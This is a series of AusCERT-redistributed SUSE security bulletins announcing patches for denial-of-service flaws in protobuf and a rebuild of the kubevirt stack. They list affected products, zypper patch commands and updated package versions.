This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yG0ckNZI30y1K9AQiiaw/+LPHOcQsZV5OYxAOW88524poMBxJmAmIg
WkmmKezjsIVLu03xDH3m0wssKh+uDA+jtMZ7d+zljH3xqi6EdOzTXUeoVGXX2csH
brBL8aXRzn/OtffkjguO79uv9k6ZTV789xK6WywNH8CkTQEVl3KJT53TH6LDXRY2
LCtch8LpDBw8kw87uTVn4v2JygLeclarB5uaFNRkeHQVW2mRdjMzlMHqXlZ2ajeu
H6hBvsr57pY2BicUuuDgSD2R8kjTOghTtERtNzLZ0bVo2pMzQhKdPR1NJtVCU/QS
MNggx4ncjlrjFJYz7vE+yFQhZXJMOnk9s+ikN7TnfVo/Z8F4l0L0flLuvdVv3EfZ
QJKvht7gGAKUm7PvkzQMCBT3fnLUtGazOsinf7UqM8BinLXKX04Q/9kWoKNuvr5C
5/By0I0LE66+uzW8aj+3PQZbGZFOoQpuwcPU7pEtJE3U8JKdy4KAMQRo19pZc6W1
qVoNN0nuGR2nn9cSXB/E/W/IVZv45Mw2A1DuANSL8hJjk/8u6kWd9ufJKU4J8pG1
X+WtSBm1NiSJfaQBycxBrZ9PSE4pHoEB4QZ3AIInResn4duYaJCk8sPkIePxN/yu
ME5WR9vnc+bbvRd3yf3NuURB0QLe53fM6inrO3ii2WjgUmT8kv5ZOxcUzYEQrexQ
0V+tfcN9iW8=
=pp0V
-----END PGP SIGNATURE-----
ESB-2022.5779 - [SUSE] protobuf: CVSS (Max): 7.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5779
Security update for protobuf
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: protobuf
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
CVE Names: CVE-2022-3171 CVE-2022-1941 CVE-2021-22569
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223922-1
Comment: CVSS (Max): 7.5 CVE-2022-3171 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVSS Source: SUSE
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for protobuf
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3922-1
Rating: important
References: #1194530 #1203681 #1204256
Cross-References: CVE-2021-22569 CVE-2022-1941 CVE-2022-3171
Affected Products:
SUSE Enterprise Storage 7
SUSE Enterprise Storage 7.1
SUSE Linux Enterprise Desktop 15-SP2
SUSE Linux Enterprise Desktop 15-SP3
SUSE Linux Enterprise Desktop 15-SP4
SUSE Linux Enterprise High Performance Computing 15-SP2
SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS
SUSE Linux Enterprise High Performance Computing 15-SP3
SUSE Linux Enterprise High Performance Computing 15-SP4
SUSE Linux Enterprise Installer 15-SP2
SUSE Linux Enterprise Micro 5.1
SUSE Linux Enterprise Micro 5.2
SUSE Linux Enterprise Micro 5.3
SUSE Linux Enterprise Module for Basesystem 15-SP3
SUSE Linux Enterprise Module for Basesystem 15-SP4
SUSE Linux Enterprise Module for Development Tools 15-SP3
SUSE Linux Enterprise Module for Development Tools 15-SP4
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP4
SUSE Linux Enterprise Module for Public Cloud 15-SP2
SUSE Linux Enterprise Module for Public Cloud 15-SP3
SUSE Linux Enterprise Module for Public Cloud 15-SP4
SUSE Linux Enterprise Module for SUSE Manager Server 4.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.2
SUSE Linux Enterprise Module for SUSE Manager Server 4.3
SUSE Linux Enterprise Server 15-SP2
SUSE Linux Enterprise Server 15-SP2-BCL
SUSE Linux Enterprise Server 15-SP2-LTSS
SUSE Linux Enterprise Server 15-SP3
SUSE Linux Enterprise Server 15-SP4
SUSE Linux Enterprise Server for SAP 15-SP2
SUSE Linux Enterprise Server for SAP Applications 15-SP2
SUSE Linux Enterprise Server for SAP Applications 15-SP3
SUSE Linux Enterprise Server for SAP Applications 15-SP4
SUSE Manager Proxy 4.1
SUSE Manager Proxy 4.2
SUSE Manager Proxy 4.3
SUSE Manager Retail Branch Server 4.1
SUSE Manager Retail Branch Server 4.2
SUSE Manager Retail Branch Server 4.3
SUSE Manager Server 4.1
SUSE Manager Server 4.2
SUSE Manager Server 4.3
openSUSE Leap 15.3
openSUSE Leap 15.4
openSUSE Leap Micro 5.2
______________________________________________________________________________
An update that fixes three vulnerabilities is now available.
Description:
This update for protobuf fixes the following issues:
o CVE-2021-22569: Fixed Denial of Service in protobuf-java in the parsing
procedure for binary data (bsc#1194530).
o CVE-2022-1941: Fix a potential DoS issue in protobuf-cpp and
protobuf-python (bsc#1203681)
o CVE-2022-3171: Fix a potential DoS issue when parsing with binary data in
protobuf-java (bsc#1204256)
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o openSUSE Leap Micro 5.2:
zypper in -t patch openSUSE-Leap-Micro-5.2-2022-3922=1
o openSUSE Leap 15.4:
zypper in -t patch openSUSE-SLE-15.4-2022-3922=1
o openSUSE Leap 15.3:
zypper in -t patch openSUSE-SLE-15.3-2022-3922=1
o SUSE Manager Server 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Server-4.1-2022-3922=1
o SUSE Manager Retail Branch Server 4.1:
zypper in -t patch
SUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.1-2022-3922=1
o SUSE Manager Proxy 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.1-2022-3922=1
o SUSE Linux Enterprise Server for SAP 15-SP2:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP2-2022-3922=1
o SUSE Linux Enterprise Server 15-SP2-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-LTSS-2022-3922=1
o SUSE Linux Enterprise Server 15-SP2-BCL:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-BCL-2022-3922=1
o SUSE Linux Enterprise Module for SUSE Manager Server 4.3:
zypper in -t patch SUSE-SLE-Module-SUSE-Manager-Server-4.3-2022-3922=1
o SUSE Linux Enterprise Module for SUSE Manager Server 4.2:
zypper in -t patch SUSE-SLE-Module-SUSE-Manager-Server-4.2-2022-3922=1
o SUSE Linux Enterprise Module for SUSE Manager Server 4.1:
zypper in -t patch SUSE-SLE-Module-SUSE-Manager-Server-4.1-2022-3922=1
o SUSE Linux Enterprise Module for Public Cloud 15-SP4:
zypper in -t patch SUSE-SLE-Module-Public-Cloud-15-SP4-2022-3922=1
o SUSE Linux Enterprise Module for Public Cloud 15-SP3:
zypper in -t patch SUSE-SLE-Module-Public-Cloud-15-SP3-2022-3922=1
o SUSE Linux Enterprise Module for Public Cloud 15-SP2:
zypper in -t patch SUSE-SLE-Module-Public-Cloud-15-SP2-2022-3922=1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP4:
zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP4-2022-3922=
1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3:
zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP3-2022-3922=
1
o SUSE Linux Enterprise Module for Development Tools 15-SP4:
zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP4-2022-3922=1
o SUSE Linux Enterprise Module for Development Tools 15-SP3:
zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP3-2022-3922=1
o SUSE Linux Enterprise Module for Basesystem 15-SP4:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP4-2022-3922=1
o SUSE Linux Enterprise Module for Basesystem 15-SP3:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2022-3922=1
o SUSE Linux Enterprise Micro 5.3:
zypper in -t patch SUSE-SLE-Micro-5.3-2022-3922=1
o SUSE Linux Enterprise Micro 5.2:
zypper in -t patch SUSE-SUSE-MicroOS-5.2-2022-3922=1
o SUSE Linux Enterprise Micro 5.1:
zypper in -t patch SUSE-SUSE-MicroOS-5.1-2022-3922=1
o SUSE Linux Enterprise Installer 15-SP2:
zypper in -t patch SUSE-SLE-INSTALLER-15-SP2-2022-3922=1
o SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-LTSS-2022-3922=1
o SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-ESPOS-2022-3922=1
o SUSE Enterprise Storage 7:
zypper in -t patch SUSE-Storage-7-2022-3922=1
Package List:
o openSUSE Leap Micro 5.2 (aarch64 x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o openSUSE Leap 15.4 (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o openSUSE Leap 15.4 (noarch):
protobuf-source-3.9.2-150200.4.19.2
o openSUSE Leap 15.4 (x86_64):
libprotobuf-lite20-32bit-3.9.2-150200.4.19.2
libprotobuf-lite20-32bit-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-32bit-3.9.2-150200.4.19.2
libprotobuf20-32bit-debuginfo-3.9.2-150200.4.19.2
libprotoc20-32bit-3.9.2-150200.4.19.2
libprotoc20-32bit-debuginfo-3.9.2-150200.4.19.2
o openSUSE Leap 15.3 (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
python2-protobuf-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o openSUSE Leap 15.3 (x86_64):
libprotobuf-lite20-32bit-3.9.2-150200.4.19.2
libprotobuf-lite20-32bit-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-32bit-3.9.2-150200.4.19.2
libprotobuf20-32bit-debuginfo-3.9.2-150200.4.19.2
libprotoc20-32bit-3.9.2-150200.4.19.2
libprotoc20-32bit-debuginfo-3.9.2-150200.4.19.2
o openSUSE Leap 15.3 (noarch):
protobuf-source-3.9.2-150200.4.19.2
o SUSE Manager Server 4.1 (ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Manager Retail Branch Server 4.1 (x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Manager Proxy 4.1 (x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Server for SAP 15-SP2 (ppc64le x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Server 15-SP2-LTSS (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Server 15-SP2-BCL (x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for SUSE Manager Server 4.3 (aarch64 ppc64le
s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for SUSE Manager Server 4.2 (aarch64 ppc64le
s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for SUSE Manager Server 4.1 (aarch64 ppc64le
s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Public Cloud 15-SP4 (aarch64 ppc64le s390x
x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Public Cloud 15-SP3 (aarch64 ppc64le s390x
x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Public Cloud 15-SP2 (aarch64 ppc64le s390x
x86_64):
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP4 (aarch64
ppc64le s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
python2-protobuf-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3 (aarch64
ppc64le s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
python2-protobuf-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Development Tools 15-SP4 (aarch64 ppc64le
s390x x86_64):
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Development Tools 15-SP3 (aarch64 ppc64le
s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Basesystem 15-SP4 (aarch64 ppc64le s390x
x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Basesystem 15-SP3 (aarch64 ppc64le s390x
x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Micro 5.3 (aarch64 s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Micro 5.2 (aarch64 s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Micro 5.1 (aarch64 s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Installer 15-SP2 (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
o SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (aarch64
x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (aarch64
x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Enterprise Storage 7 (aarch64 x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
References:
o https://www.suse.com/security/cve/CVE-2021-22569.html
o https://www.suse.com/security/cve/CVE-2022-1941.html
o https://www.suse.com/security/cve/CVE-2022-3171.html
o https://bugzilla.suse.com/1194530
o https://bugzilla.suse.com/1203681
o https://bugzilla.suse.com/1204256
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yGuckNZI30y1K9AQi6Xw/+LDO77p15tRogHhwcR4CLrRAp7wXdBwFt
0ayc/LVCtYsseHtUBOi/74uPkcNj1CkHqd8bS943ZpAlLvT2haB4WK8rmxCrr1gE
ipfFbOuTT08fk/RaY9oFc0Pu/ziI5TFvqgbN0o39ow61FgA9nooDjJcPSwtPfRQf
VeiUH9/NsTKQ5JfvZHe3Widk8AwEKzUOFO16igNlkW8rqQKemlbysehcm2efQGED
wwj3vP5JERHD1T8EEH1YA3/0p1floKNz6YJBYW6pxTxKPr28djYlb8RIe1rT4K8R
jSbf/z8gznZSIl01wtx9kov7CwJiTzYJRvusRaA1htOIZpcSobGysQwHgXrraHMc
xJmp4TUUSB045pVBWsuXR067EMlkWDbAsSug4R+Swi76OSwLdKU8A4/e6y6AtMhf
GgT5m/pA/n8i7YRFkmPI+fk1uFj4he8KBliQNEVZ2HWhmyzVh1rM3HR9Be6/WoTC
aKZ69GALai5sIq9YDQDlbIXAZK7dC9s31YzpwRRgd/5gud5dPwQHVNCXzfMINf4F
+B7XN/rWN9VDUhgcxuuIu6hWtSQBrcUM9i2f6enxmJ+0rewdfojHo+zWqgWIK1vj
sZmQ6nZMc5cbmQy4E+Kmar7Jfez3g1fo/OqUY4Azu5l348fyJOtVIW0V0cXF+ddq
pNzcA5cK0TQ=
=6F9K
-----END PGP SIGNATURE-----
ESB-2022.5778 - [SUSE] kubevirt: CVSS (Max): None
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5778
Security update for kubevirt
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: kubevirt
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223919-1
Comment: CVSS (Max): None available when published
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for kubevirt
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3919-1
Rating: important
References:
Affected Products:
SUSE Enterprise Storage 7.1
SUSE Linux Enterprise High Performance Computing 15-SP3
SUSE Linux Enterprise Module for Containers 15-SP3
SUSE Linux Enterprise Server 15-SP3
SUSE Linux Enterprise Server for SAP Applications 15-SP3
SUSE Manager Proxy 4.2
SUSE Manager Retail Branch Server 4.2
SUSE Manager Server 4.2
openSUSE Leap 15.3
______________________________________________________________________________
An update that contains security fixes can now be installed.
Description:
This update rebuilds the kubevirt stack to include recent security updates in
its basecontainers.
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o openSUSE Leap 15.3:
zypper in -t patch openSUSE-SLE-15.3-2022-3919=1
o SUSE Linux Enterprise Module for Containers 15-SP3:
zypper in -t patch SUSE-SLE-Module-Containers-15-SP3-2022-3919=1
Package List:
o openSUSE Leap 15.3 (x86_64):
kubevirt-container-disk-0.49.0-150300.8.15.1
kubevirt-container-disk-debuginfo-0.49.0-150300.8.15.1
kubevirt-manifests-0.49.0-150300.8.15.1
kubevirt-tests-0.49.0-150300.8.15.1
kubevirt-tests-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-api-0.49.0-150300.8.15.1
kubevirt-virt-api-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-controller-0.49.0-150300.8.15.1
kubevirt-virt-controller-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-handler-0.49.0-150300.8.15.1
kubevirt-virt-handler-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-launcher-0.49.0-150300.8.15.1
kubevirt-virt-launcher-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-operator-0.49.0-150300.8.15.1
kubevirt-virt-operator-debuginfo-0.49.0-150300.8.15.1
kubevirt-virtctl-0.49.0-150300.8.15.1
kubevirt-virtctl-debuginfo-0.49.0-150300.8.15.1
obs-service-kubevirt_containers_meta-0.49.0-150300.8.15.1
o SUSE Linux Enterprise Module for Containers 15-SP3 (x86_64):
kubevirt-manifests-0.49.0-150300.8.15.1
kubevirt-virtctl-0.49.0-150300.8.15.1
kubevirt-virtctl-debuginfo-0.49.0-150300.8.15.1
References:
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yGp8kNZI30y1K9AQgE7hAApWsU/N3qQG1bZ6C5DA5Tns/N2VF3PGpX
OVkfxLS08Y12WqtB2HQfDHM/0UwQWlGI9hJlobQCRb07w8kjJ54zFBYPk+fI5SF4
lm7yZryQbEriX6jUxdVqiAawn26Hg27g+Y/J8TLikPKsVt5zPtaJ08wflXbOhhhe
jHp8aZP1lHpuzpks+UY0YrxCaKAq4Lof8F+ZsqKWsxiWNTObx7GYrt8it+1me9YF
js5lgM9Tx0RYJPKu27ZOru77gBCPGSZXzHCksq1L8mGyiOXj14R6hMklB4lpaSgM
R5m36o2TY3sP9Wxd6kvnfZsp5qbRH/7ngprsSkbVPWeQTMSEyV8ZlbiC/cS+gbrR
zXgsbgbyFMju/dYuuZbNXAKcIMVta0SMAS88V8zzHVSTqDggAQgmYCaeNHp0dV2P
WWp8M1z79ueFWHXcOFxyLPpCoSCHsQQRQSPLA45VxVrRNyE6liqY6KrOqzrLpRN5
GYq1Lnbep9CxfwBvUw5wzaxVp1lYj5yocJD3CZ6JVJAuiz8+DakCSjW3p0hIZesx
UL4DX+7OzD+gjMy6OaDn8G0090qeCPiud4NvsTMiqGyPl6jl4Z8kPah7M9JKKsE9
KYJfXH2xFR4h0GUppMBanxlDNXMGxINHm8ppfwV2bMO1T//eluZnYSqTXip/cmLX
